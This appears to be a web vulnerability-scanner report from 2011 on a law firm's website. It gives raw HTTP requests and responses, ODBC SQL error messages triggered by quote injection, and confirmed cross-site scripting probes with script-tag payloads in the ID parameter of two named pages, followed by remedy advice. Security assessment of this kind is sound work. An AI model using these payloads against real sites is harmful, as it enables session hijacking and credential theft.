<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Articles</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
<img border="0" src="images/n.jpg" width="46" height="31"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="211">
<tr>
<td width="52%" height="210" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
<tr><td colspan=7 color=#000000 bgcolor=#ffff00><tt><b>Database Results Error</b><br><i>Description:</i> [Microsoft][ODBC Microsoft Access Driver] Undefined function 'convert' in expression.<br><i>Number:</i> -2147217900 (0x80040E14)<br><i>Source:</i> Microsoft OLE DB Provider for ODBC Drivers<br></tt></td></tr></tbody>
</table>
<p style="margin-left: 100; margin-right: 5">
<a href="javascript:history.go(-1)"><b>
<font face="Verdana" style="font-size: 8.5pt">� </font></b>
<font face="Verdana" style="font-size: 8.5pt">RETURN TO SEARCH RESULTS</font></a></td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="210" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="210" bgcolor="#FFFFFF">
<p align="center">
<img border="0" src="images/ews_res.jpg" align="right" width="46" height="455"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td>
</tr>
</table>

</td>
<td width="90%" height="590" valign="top">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="228">
<tr>
<td width="100%" height="10" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="33" bgcolor="#C8000A">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="166" bgcolor="#616163">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="19" bgcolor="#4C4C4C">&nbsp;</td>
</tr>
</table>
<p align="right">
&nbsp;</td>
</tr>
</table>

</body>

</html>
- /disc/cntcdisclaimer.asp

/disc/cntcdisclaimer.asp

http://www.brownrudnick.com/disc/cntcdisclaimer.asp?ID=%2527

Parameters

Parameter Type Value
ID GET %27

Request

GET /disc/cntcdisclaimer.asp?ID=%2527 HTTP/1.1
Referer: http://www.brownrudnick.com/nr/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:59:22 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12636
Content-Type: text/html
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg" width="758" height="18"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../nr/">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover">
<a href="cntcdisclaimer.asp"><font face="Verdana" size="1">terms of use</font></a></td>

</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="../images/filecabTB.jpg" width="244" height="178"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
</td>
<td width="48%" height="3">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Notice</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="386">
<tr>
<td width="52%" height="385" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<p style="line-height: 105%; margin-left:100px; margin-right:5px">
<font face="Verdana" style="font-size: 9pt">Y</font><font style="font-size: 8.5pt" face="Verdana">ou
understand and agree that transmitting information to Brown
Rudnick&nbsp;by e-mail does not establish an attorney-client
relationship. By clicking the &quot;Agree&quot; link below, you acknowledge
that (i) Brown Rudnick&nbsp;has no obligation to maintain the
confidentiality of any information you submit to Brown
Rudnick&nbsp;unless Brown Rudnick&nbsp;already represents you or Brown
Rudnick&nbsp;later agrees to represent you; thus, if you are not a
client, information you submit to Brown Rudnick&nbsp;by e-mail may be
disclosed to others and (ii) you have read and
understand the Brown Rudnick <a target="_blank" href="../terms.htm">
Terms of Use</a> and
<a target="_blank" href="../privacy.htm">Privacy Policy</a> and that you agree to be bound by
the terms and conditions of such
<a target="_blank" href="../terms.htm">Terms of Use</a> and
<a target="_blank" href="../privacy.htm">Privacy Policy</a>.</font></p>
<p style="line-height: 105%; margin-left:100px; margin-right:5px">
<font face="Verdana" style="font-size: 8.5pt">If you would like to
discuss becoming a client, please contact one of Brown Rudnick's
attorneys to arrange for a meeting or telephone conference. Thank
you for your interest in Brown Rudnick.</font></p>
<font size="2">
<div align="center">
<table id="table2" width="204">
<tbody>
<tr><td colspan=2 color=#000000 bgcolor=#ffff00><tt><b>Database Results Error</b><br><i>Description:</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression '(ID = %27)'.<br><i>Number:</i> -2147217900 (0x80040E14)<br><i>Source:</i> Microsoft OLE DB Provider for ODBC Drivers<br></tt></td></tr></tbody>
</table></div>
</font>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber10" height="39">
<tr>
<td width="100%" height="39">
<form method="POST" action="../search/result.asp">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="689" id="AutoNumber12" height="49">
<tr>
<td width="100%" height="22">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
&nbsp;<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font face="Verdana" size="1"><a href="javascript:history.back()">
Previous Page</a></font><font face="Verdana" style="font-size: 8.5pt"><br>
<br>
&nbsp;</font></td>
</tr>
</table>

</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table height="20" cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
</tbody>
</table>
</td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="385" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="385" bgcolor="#FFFFFF">
<p align="center" style="margin-left: 4">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td>
</tr>
</table>

</td>
<td width="90%" height="590" valign="top">

<table border..
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /nr/articlesIndv.asp

/nr/articlesIndv.asp CONFIRMED

http://www.brownrudnick.com/nr/articlesIndv.asp?ID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
ID GET '"--></style></script><script>alert(0x000041)</script>

Request

GET /nr/articlesIndv.asp?ID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000041)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:56:41 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11229
Content-Type: text/html
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="navDefault"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../nr">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_self" href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../terms.htm">terms of use</a></font></td>
</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="images/booksTB.jpg"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
<p align="right" style="margin-right: 10"><b>
<font face="Verdana" size="1" color="#FFFFFF">news/resources</font></b></td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
<p class="class2" align="right"></td>
<td width="48%" height="3">
<font face="Verdana" size="1"><a href="alerts.asp">alerts &amp;
newsletters</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="articles.asp">articles</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="press.asp">press
releases</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="publications.asp">publications</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../glossary/glossary.htm">
glossary of VC &amp; IPO terms</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../blog/governmentcontracts/default.asp">blogs</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../podcast/default.htm">podcasts</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Articles</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
<img border="0" src="images/n.jpg" width="46" height="31"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="211">
<tr>
<td width="52%" height="210" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
<tr><td colspan=7 color=#000000 bgcolor=#ffff00><tt><b>Database Results Error</b><br><i>Description:</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '(ID = '"--></style></script><script>netsparker(0x000041)</script>)'.<br><i>Number:</i> -2147217900 (0x80040E14)<br><i>Source:</i> Microsoft OLE DB Provider for ODBC Drivers<br></tt></td></tr></tbody>
</table>
<p style="margin-left: 100; margin-right: 5">
<a href="javascript:history.go(-1)"><b>
<font face="Verdana" style="font-size: 8.5pt">� </font></b>
<font face="Verdana" style="font-size: 8.5pt">RETURN TO SEARCH RESULTS</font></a></td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="210" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="210" bgcolor="#FFFFFF">
<p align="center">
<img border="0" src="images/ews_res.jpg" align="right" width="46" height="455"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td>
</tr>
</table>

</td>
<td width="90%" height="590" valign="top">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="228">
<tr>
<td width="100%" height="10" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="33" bgcolor="#C8000A">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="166" bgcolor="#616163">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="19" bgcolor="#4C4C4C">&nbsp;</td>
</tr>
</table>
<p align="right">
&nbsp;</td>
</tr>
</table>

</body>

</html>
- /disc/cntcdisclaimer.asp

/disc/cntcdisclaimer.asp CONFIRMED

http://www.brownrudnick.com/disc/cntcdisclaimer.asp?ID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
ID GET '"--></style></script><script>alert(0x00050A)</script>

Request

GET /disc/cntcdisclaimer.asp?ID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00050A)%3C/script%3E HTTP/1.1
Referer: http://www.brownrudnick.com/nr/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:59:31 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12702
Content-Type: text/html
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg" width="758" height="18"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../nr/">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover">
<a href="cntcdisclaimer.asp"><font face="Verdana" size="1">terms of use</font></a></td>

</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="../images/filecabTB.jpg" width="244" height="178"></td>
